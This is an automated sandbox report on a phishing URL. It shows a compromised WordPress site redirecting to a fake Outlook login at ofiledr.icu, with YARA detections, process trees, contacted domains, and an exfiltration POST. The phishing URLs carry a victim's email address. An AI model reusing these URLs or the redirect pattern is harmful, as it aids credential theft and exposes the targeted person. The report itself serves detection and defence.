Edit tour

Windows Analysis Report
https://chiltonconsultingllc.com/#YmpwYXJpc2gkc3RlaW5ib3JuLmNvbQ==

Overview

General Information

Sample URL:	https://chiltonconsultingllc.com/#YmpwYXJpc2gkc3RlaW5ib3JuLmNvbQ==
Analysis ID:	1590097
Infos:

Detection

Outlook Phishing, HTMLPhisher

Score:	72
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

AI detected phishing page

Antivirus detection for URL or domain

Yara detected HtmlPhish10

AI detected suspicious Javascript

Yara detected Outlook Phishing page

HTML body contains low number of good links

HTML body with high number of embedded images detected

HTML title does not match URL

Stores files to the Windows start menu directory

Suspicious form URL found

Classification

Process Tree

System is w10x64_ra

chrome.exe (PID: 7012 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 6272 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2176 --field-trial-handle=1988,i,4837973195230728328,11185042027059048456,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 2312 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://chiltonconsultingllc.com/#YmpwYXJpc2gkc3RlaW5ib3JuLmNvbQ==" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

cleanup

Yara Signatures

HTML

Source	Rule	Description	Author
2.1.pages.csv	JoeSecurity_HtmlPhish_10	Yara detected HtmlPhish_10	Joe Security
2.1.pages.csv	JoeSecurity_OutlookPhishing	Yara detected Outlook Phishing page	Joe Security
3.2.pages.csv	JoeSecurity_HtmlPhish_10	Yara detected HtmlPhish_10	Joe Security
3.2.pages.csv	JoeSecurity_OutlookPhishing	Yara detected Outlook Phishing page	Joe Security

HTTP traffic detected: POST /check.php?tap=p7mBCg9W07nEY2tzReNHAdQeksgfGq8fpkT2ic5rQTwbmLPI4F72lQtlllUBG4fWmoBFzfvss4U0MBVOWWdYCdNaTF0sTXUuEu9T2lovHJzG5JEQkPJicANgAMo08Nkg HTTP/1.1Host: www.ofiledr.icuConnection: keep-aliveContent-Length: 9Cache-Control: max-age=0sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1Origin: nullContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=40332551ec4a203db3b8e8949b2fd8d5

Source: chromecache_67.2.dr, chromecache_63.2.dr	String found in binary or memory: http://www.ascenderfonts.com/info/webfont-eula.aspx
Source: chromecache_66.2.dr	String found in binary or memory: https://api.w.org/
Source: chromecache_66.2.dr	String found in binary or memory: https://chiltonconsultingllc.com
Source: chromecache_66.2.dr	String found in binary or memory: https://chiltonconsultingllc.com/
Source: chromecache_66.2.dr	String found in binary or memory: https://chiltonconsultingllc.com/comments/feed/
Source: chromecache_66.2.dr	String found in binary or memory: https://chiltonconsultingllc.com/contact/
Source: chromecache_66.2.dr	String found in binary or memory: https://chiltonconsultingllc.com/feed/
Source: chromecache_66.2.dr	String found in binary or memory: https://chiltonconsultingllc.com/history/
Source: chromecache_66.2.dr	String found in binary or memory: https://chiltonconsultingllc.com/services/
Source: chromecache_66.2.dr	String found in binary or memory: https://chiltonconsultingllc.com/wp-content/plugins/contact-form-7/includes/css/styles.css?ver=5.7.7
Source: chromecache_66.2.dr	String found in binary or memory: https://chiltonconsultingllc.com/wp-content/plugins/contact-form-7/includes/js/index.js?ver=5.7.7
Source: chromecache_66.2.dr	String found in binary or memory: https://chiltonconsultingllc.com/wp-content/plugins/contact-form-7/includes/swv/js/index.js?ver=5.7.
Source: chromecache_66.2.dr	String found in binary or memory: https://chiltonconsultingllc.com/wp-content/plugins/js_composer_salient/assets/css/js_composer.min.c
Source: chromecache_66.2.dr	String found in binary or memory: https://chiltonconsultingllc.com/wp-content/plugins/js_composer_salient/assets/js/dist/js_composer_f
Source: chromecache_66.2.dr	String found in binary or memory: https://chiltonconsultingllc.com/wp-content/plugins/salient-core/js/third-party/touchswipe.min.js?ve
Source: chromecache_66.2.dr	String found in binary or memory: https://chiltonconsultingllc.com/wp-content/plugins/salient-portfolio/js/third-party/imagesLoaded.mi
Source: chromecache_66.2.dr	String found in binary or memory: https://chiltonconsultingllc.com/wp-content/plugins/salient-social/css/style.css?ver=1.2
Source: chromecache_66.2.dr	String found in binary or memory: https://chiltonconsultingllc.com/wp-content/plugins/salient-social/js/salient-social.js?ver=1.2
Source: chromecache_66.2.dr	String found in binary or memory: https://chiltonconsultingllc.com/wp-content/themes/salient/css/elements/asset-reveal-animation.css?v
Source: chromecache_66.2.dr	String found in binary or memory: https://chiltonconsultingllc.com/wp-content/themes/salient/css/elements/element-cascading-images.css
Source: chromecache_66.2.dr	String found in binary or memory: https://chiltonconsultingllc.com/wp-content/themes/salient/css/font-awesome-legacy.min.css?ver=4.7.1
Source: chromecache_66.2.dr	String found in binary or memory: https://chiltonconsultingllc.com/wp-content/themes/salient/css/grid-system.css?ver=13.0.5
Source: chromecache_66.2.dr	String found in binary or memory: https://chiltonconsultingllc.com/wp-content/themes/salient/css/off-canvas/core.css?ver=13.0.5
Source: chromecache_66.2.dr	String found in binary or memory: https://chiltonconsultingllc.com/wp-content/themes/salient/css/off-canvas/slide-out-right-hover.css?
Source: chromecache_66.2.dr	String found in binary or memory: https://chiltonconsultingllc.com/wp-content/themes/salient/css/plugins/jquery.fancybox.css?ver=3.3.1
Source: chromecache_66.2.dr	String found in binary or memory: https://chiltonconsultingllc.com/wp-content/themes/salient/css/responsive.css?ver=13.0.5
Source: chromecache_66.2.dr	String found in binary or memory: https://chiltonconsultingllc.com/wp-content/themes/salient/css/salient-dynamic-styles.css?ver=89431
Source: chromecache_66.2.dr	String found in binary or memory: https://chiltonconsultingllc.com/wp-content/themes/salient/css/skin-material.css?ver=13.0.5
Source: chromecache_66.2.dr	String found in binary or memory: https://chiltonconsultingllc.com/wp-content/themes/salient/css/style.css?ver=13.0.5
Source: chromecache_66.2.dr	String found in binary or memory: https://chiltonconsultingllc.com/wp-content/themes/salient/js/init.js?ver=13.0.5
Source: chromecache_66.2.dr	String found in binary or memory: https://chiltonconsultingllc.com/wp-content/themes/salient/js/priority.js?ver=13.0.5
Source: chromecache_66.2.dr	String found in binary or memory: https://chiltonconsultingllc.com/wp-content/themes/salient/js/third-party/hoverintent.js?ver=1.9
Source: chromecache_66.2.dr	String found in binary or memory: https://chiltonconsultingllc.com/wp-content/themes/salient/js/third-party/intersection-observer.js?v
Source: chromecache_66.2.dr	String found in binary or memory: https://chiltonconsultingllc.com/wp-content/themes/salient/js/third-party/jquery.easing.js?ver=1.3
Source: chromecache_66.2.dr	String found in binary or memory: https://chiltonconsultingllc.com/wp-content/themes/salient/js/third-party/jquery.fancybox.min.js?ver
Source: chromecache_66.2.dr	String found in binary or memory: https://chiltonconsultingllc.com/wp-content/themes/salient/js/third-party/jquery.mousewheel.js?ver=3
Source: chromecache_66.2.dr	String found in binary or memory: https://chiltonconsultingllc.com/wp-content/themes/salient/js/third-party/superfish.js?ver=1.5.8
Source: chromecache_66.2.dr	String found in binary or memory: https://chiltonconsultingllc.com/wp-content/themes/salient/js/third-party/transit.js?ver=0.9.9
Source: chromecache_66.2.dr	String found in binary or memory: https://chiltonconsultingllc.com/wp-content/themes/salient/js/third-party/waypoints.js?ver=4.0.2
Source: chromecache_66.2.dr	String found in binary or memory: https://chiltonconsultingllc.com/wp-content/uploads/2021/12/Captura-de-Pantalla-2021-12-20-a-las-09.
Source: chromecache_66.2.dr	String found in binary or memory: https://chiltonconsultingllc.com/wp-content/uploads/2021/12/cranes-offloading-cargo-from-ship-on-to-
Source: chromecache_66.2.dr	String found in binary or memory: https://chiltonconsultingllc.com/wp-content/uploads/2021/12/international-trade-300x169.jpg
Source: chromecache_66.2.dr	String found in binary or memory: https://chiltonconsultingllc.com/wp-content/uploads/2021/12/international-trade.jpg
Source: chromecache_66.2.dr	String found in binary or memory: https://chiltonconsultingllc.com/wp-content/uploads/2022/05/Captura-de-Pantalla-2022-05-06-a-las-10.
Source: chromecache_66.2.dr	String found in binary or memory: https://chiltonconsultingllc.com/wp-content/uploads/2022/05/ChiltonConsultingllc_1.png
Source: chromecache_66.2.dr	String found in binary or memory: https://chiltonconsultingllc.com/wp-content/uploads/salient/menu-dynamic.css?ver=88696
Source: chromecache_66.2.dr	String found in binary or memory: https://chiltonconsultingllc.com/wp-includes/css/dist/block-library/style.min.css?ver=6.7.1
Source: chromecache_66.2.dr	String found in binary or memory: https://chiltonconsultingllc.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.4.1
Source: chromecache_66.2.dr	String found in binary or memory: https://chiltonconsultingllc.com/wp-includes/js/jquery/jquery.min.js?ver=3.7.1
Source: chromecache_66.2.dr	String found in binary or memory: https://chiltonconsultingllc.com/wp-json/
Source: chromecache_66.2.dr	String found in binary or memory: https://chiltonconsultingllc.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fchiltonconsultingllc.com
Source: chromecache_66.2.dr	String found in binary or memory: https://chiltonconsultingllc.com/wp-json/wp/v2/pages/12
Source: chromecache_66.2.dr	String found in binary or memory: https://chiltonconsultingllc.com/xmlrpc.php?rsd
Source: chromecache_66.2.dr	String found in binary or memory: https://fonts.googleapis.com/css?family=Open
Source: chromecache_66.2.dr	String found in binary or memory: https://fonts.googleapis.com/css?family=Poppins%3A600%2C800%7CRoboto%3A300%2C700%2C400&ver=1657
Source: chromecache_66.2.dr	String found in binary or memory: https://opacks.online/#
Source: chromecache_66.2.dr	String found in binary or memory: https://ozxa.xyz/#
Source: chromecache_64.2.dr, chromecache_66.2.dr	String found in binary or memory: https://regenbogen-kueche.de/clean/token/referrer=
Source: chromecache_64.2.dr, chromecache_66.2.dr	String found in binary or memory: https://www.kaandlarugs.com/vincar/token/referrer=
Source: chromecache_64.2.dr	String found in binary or memory: https://www.ofiledr.icu/?email=
Source: chromecache_64.2.dr, chromecache_66.2.dr	String found in binary or memory: https://www.web-api.top/?email=

Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49700
Source: unknown	Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown	Network traffic detected: HTTP traffic on port 49678 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49702 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown	Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown	Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49673 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49726 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49700 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown	Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49726
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49724
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49702
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49723
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443

Source: classification engine

Classification label: mal72.phis.win@19/21@10/6

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

File created: C:\Program Files\Google\Chrome\Application\Dictionaries

Jump to behavior

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps

Jump to behavior

Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2176 --field-trial-handle=1988,i,4837973195230728328,11185042027059048456,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://chiltonconsultingllc.com/#YmpwYXJpc2gkc3RlaW5ib3JuLmNvbQ=="
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2176 --field-trial-handle=1988,i,4837973195230728328,11185042027059048456,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior

Source: Google Drive.lnk.1.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: YouTube.lnk.1.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Sheets.lnk.1.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Gmail.lnk.1.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Slides.lnk.1.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Docs.lnk.1.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

Directory created: C:\Program Files\Google\Chrome\Application\Dictionaries

Jump to behavior

Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk	Jump to behavior

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	Windows Management Instrumentation	1 Browser Extensions	1 Process Injection	3 Masquerading	OS Credential Dumping	System Service Discovery	Remote Services	Data from Local System	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 Registry Run Keys / Startup Folder	1 Registry Run Keys / Startup Folder	1 Process Injection	LSASS Memory	Application Window Discovery	Remote Desktop Protocol	Data from Removable Media	3 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	1 Obfuscated Files or Information	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	4 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	Binary Padding	NTDS	System Network Configuration Discovery	Distributed Component Object Model	Input Capture	1 Ingress Tool Transfer	Traffic Duplication	Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
https://chiltonconsultingllc.com/#YmpwYXJpc2gkc3RlaW5ib3JuLmNvbQ==	0%	Avira URL Cloud	safe

Source	Detection	Scanner	Label
https://chiltonconsultingllc.com/wp-content/plugins/contact-form-7/includes/swv/js/index.js?ver=5.7.	0%	Avira URL Cloud	safe
https://chiltonconsultingllc.com/wp-content/plugins/contact-form-7/includes/css/styles.css?ver=5.7.7	0%	Avira URL Cloud	safe
https://www.ofiledr.icu/auth/?email=bjparish@steinborn.com&sessid=MTczNjc3ODQ5NzAxMzZhZTNjMzhjN2FlMzQ4MmJhOTg1M2E1ZmY0NTE1ODQyNTQ2NmJjNWJjZjdlNDk4NjI2MGU2NWQ5OGJiN2MxYmVjNjUxNQ==	100%	Avira URL Cloud	phishing
https://chiltonconsultingllc.com/wp-content/themes/salient/js/init.js?ver=13.0.5	0%	Avira URL Cloud	safe
https://www.ofiledr.icu/auth?email=bjparish@steinborn.com&sessid=MTczNjc3ODQ5NzAxMzZhZTNjMzhjN2FlMzQ4MmJhOTg1M2E1ZmY0NTE1ODQyNTQ2NmJjNWJjZjdlNDk4NjI2MGU2NWQ5OGJiN2MxYmVjNjUxNQ==	100%	Avira URL Cloud	phishing
https://chiltonconsultingllc.com/wp-includes/css/dist/block-library/style.min.css?ver=6.7.1	0%	Avira URL Cloud	safe
https://chiltonconsultingllc.com/wp-includes/js/jquery/jquery.min.js?ver=3.7.1	0%	Avira URL Cloud	safe
https://chiltonconsultingllc.com/wp-content/themes/salient/css/off-canvas/core.css?ver=13.0.5	0%	Avira URL Cloud	safe
https://chiltonconsultingllc.com/feed/	0%	Avira URL Cloud	safe
https://chiltonconsultingllc.com/wp-content/plugins/js_composer_salient/assets/js/dist/js_composer_f	0%	Avira URL Cloud	safe
https://chiltonconsultingllc.com/wp-content/themes/salient/js/third-party/waypoints.js?ver=4.0.2	0%	Avira URL Cloud	safe
https://chiltonconsultingllc.com/wp-content/uploads/2021/12/international-trade.jpg	0%	Avira URL Cloud	safe
https://www.ofiledr.icu/?email=YmpwYXJpc2hAc3RlaW5ib3JuLmNvbQ==	0%	Avira URL Cloud	safe
https://chiltonconsultingllc.com/wp-content/plugins/contact-form-7/includes/js/index.js?ver=5.7.7	0%	Avira URL Cloud	safe
https://opacks.online/	0%	Avira URL Cloud	safe
https://regenbogen-kueche.de/clean/token/referrer=	0%	Avira URL Cloud	safe
https://chiltonconsultingllc.com/wp-content/uploads/2021/12/Captura-de-Pantalla-2021-12-20-a-las-09.	0%	Avira URL Cloud	safe
https://chiltonconsultingllc.com/wp-json/	0%	Avira URL Cloud	safe
https://chiltonconsultingllc.com/history/	0%	Avira URL Cloud	safe
https://chiltonconsultingllc.com/wp-content/plugins/salient-social/css/style.css?ver=1.2	0%	Avira URL Cloud	safe
https://chiltonconsultingllc.com/wp-content/themes/salient/css/skin-material.css?ver=13.0.5	0%	Avira URL Cloud	safe
https://chiltonconsultingllc.com/wp-content/uploads/2022/05/Captura-de-Pantalla-2022-05-06-a-las-10.	0%	Avira URL Cloud	safe
https://www.ofiledr.icu/?email=	0%	Avira URL Cloud	safe
https://chiltonconsultingllc.com/wp-content/themes/salient/css/font-awesome-legacy.min.css?ver=4.7.1	0%	Avira URL Cloud	safe
https://ozxa.xyz/#	0%	Avira URL Cloud	safe
https://www.ofiledr.icu/auth/auth.php	100%	Avira URL Cloud	phishing
https://chiltonconsultingllc.com/wp-content/themes/salient/js/priority.js?ver=13.0.5	0%	Avira URL Cloud	safe
https://chiltonconsultingllc.com/wp-content/themes/salient/css/style.css?ver=13.0.5	0%	Avira URL Cloud	safe
https://chiltonconsultingllc.com/wp-json/wp/v2/pages/12	0%	Avira URL Cloud	safe
https://chiltonconsultingllc.com/wp-content/uploads/salient/menu-dynamic.css?ver=88696	0%	Avira URL Cloud	safe
https://chiltonconsultingllc.com/	0%	Avira URL Cloud	safe
https://www.ofiledr.icu/auth/resources/segoeui-regular.ttf	100%	Avira URL Cloud	phishing
https://chiltonconsultingllc.com/wp-content/themes/salient/css/salient-dynamic-styles.css?ver=89431	0%	Avira URL Cloud	safe
https://chiltonconsultingllc.com/comments/feed/	0%	Avira URL Cloud	safe
https://chiltonconsultingllc.com/wp-content/themes/salient/js/third-party/jquery.fancybox.min.js?ver	0%	Avira URL Cloud	safe
https://chiltonconsultingllc.com/wp-content/themes/salient/js/third-party/transit.js?ver=0.9.9	0%	Avira URL Cloud	safe
https://chiltonconsultingllc.com/wp-content/themes/salient/css/responsive.css?ver=13.0.5	0%	Avira URL Cloud	safe
https://chiltonconsultingllc.com/wp-content/uploads/2021/12/international-trade-300x169.jpg	0%	Avira URL Cloud	safe
https://chiltonconsultingllc.com/xmlrpc.php?rsd	0%	Avira URL Cloud	safe
http://www.ascenderfonts.com/info/webfont-eula.aspx	0%	Avira URL Cloud	safe
https://chiltonconsultingllc.com/wp-content/themes/salient/js/third-party/jquery.easing.js?ver=1.3	0%	Avira URL Cloud	safe
https://www.web-api.top/?email=	100%	Avira URL Cloud	phishing
https://chiltonconsultingllc.com/services/	0%	Avira URL Cloud	safe
https://chiltonconsultingllc.com/wp-content/themes/salient/css/elements/asset-reveal-animation.css?v	0%	Avira URL Cloud	safe
https://www.ofiledr.icu/auth/resources/favicon.ico	100%	Avira URL Cloud	phishing
https://chiltonconsultingllc.com/wp-content/plugins/salient-social/js/salient-social.js?ver=1.2	0%	Avira URL Cloud	safe
https://chiltonconsultingllc.com/wp-content/plugins/salient-core/js/third-party/touchswipe.min.js?ve	0%	Avira URL Cloud	safe
https://chiltonconsultingllc.com/wp-content/themes/salient/css/elements/element-cascading-images.css	0%	Avira URL Cloud	safe
https://chiltonconsultingllc.com/wp-content/plugins/salient-portfolio/js/third-party/imagesLoaded.mi	0%	Avira URL Cloud	safe
https://chiltonconsultingllc.com	0%	Avira URL Cloud	safe
https://chiltonconsultingllc.com/wp-content/themes/salient/js/third-party/jquery.mousewheel.js?ver=3	0%	Avira URL Cloud	safe
https://chiltonconsultingllc.com/wp-content/themes/salient/css/grid-system.css?ver=13.0.5	0%	Avira URL Cloud	safe
https://chiltonconsultingllc.com/wp-content/themes/salient/css/off-canvas/slide-out-right-hover.css?	0%	Avira URL Cloud	safe
https://chiltonconsultingllc.com/wp-content/themes/salient/js/third-party/intersection-observer.js?v	0%	Avira URL Cloud	safe
https://chiltonconsultingllc.com/wp-content/plugins/js_composer_salient/assets/css/js_composer.min.c	0%	Avira URL Cloud	safe
https://chiltonconsultingllc.com/wp-content/themes/salient/js/third-party/superfish.js?ver=1.5.8	0%	Avira URL Cloud	safe
https://chiltonconsultingllc.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fchiltonconsultingllc.com	0%	Avira URL Cloud	safe
https://chiltonconsultingllc.com/wp-content/themes/salient/js/third-party/hoverintent.js?ver=1.9	0%	Avira URL Cloud	safe
https://chiltonconsultingllc.com/wp-content/uploads/2021/12/cranes-offloading-cargo-from-ship-on-to-	0%	Avira URL Cloud	safe
https://chiltonconsultingllc.com/wp-content/uploads/2022/05/ChiltonConsultingllc_1.png	0%	Avira URL Cloud	safe
https://chiltonconsultingllc.com/contact/	0%	Avira URL Cloud	safe
https://www.ofiledr.icu/auth/resources/segoeui-semilight.ttf	100%	Avira URL Cloud	phishing
https://chiltonconsultingllc.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.4.1	0%	Avira URL Cloud	safe
https://www.kaandlarugs.com/vincar/token/referrer=	0%	Avira URL Cloud	safe
https://www.ofiledr.icu/index.php?csrftoken=MTczNjc3ODQ5NzAxMzZhZTNjMzhjN2FlMzQ4MmJhOTg1M2E1ZmY0NTE1ODQyNTQ2NmJjNWJjZjdlNDk4NjI2MGU2NWQ5OGJiN2MxYmVjNjUxNQ==	0%	Avira URL Cloud	safe
https://opacks.online/#	0%	Avira URL Cloud	safe
https://chiltonconsultingllc.com/wp-content/themes/salient/css/plugins/jquery.fancybox.css?ver=3.3.1	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
www.ofiledr.icu	111.90.140.57	true	false	high
opacks.online	111.90.140.55	true	true	unknown
www.google.com	216.58.206.36	true	false	high
chiltonconsultingllc.com	172.67.147.135	true	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://www.ofiledr.icu/check.php?tap=p7mBCg9W07nEY2tzReNHAdQeksgfGq8fpkT2ic5rQTwbmLPI4F72lQtlllUBG4fWmoBFzfvss4U0MBVOWWdYCdNaTF0sTXUuEu9T2lovHJzG5JEQkPJicANgAMo08Nkg	false		unknown
https://www.ofiledr.icu/auth/?email=bjparish@steinborn.com&sessid=MTczNjc3ODQ5NzAxMzZhZTNjMzhjN2FlMzQ4MmJhOTg1M2E1ZmY0NTE1ODQyNTQ2NmJjNWJjZjdlNDk4NjI2MGU2NWQ5OGJiN2MxYmVjNjUxNQ==	false	Avira URL Cloud: phishing	unknown
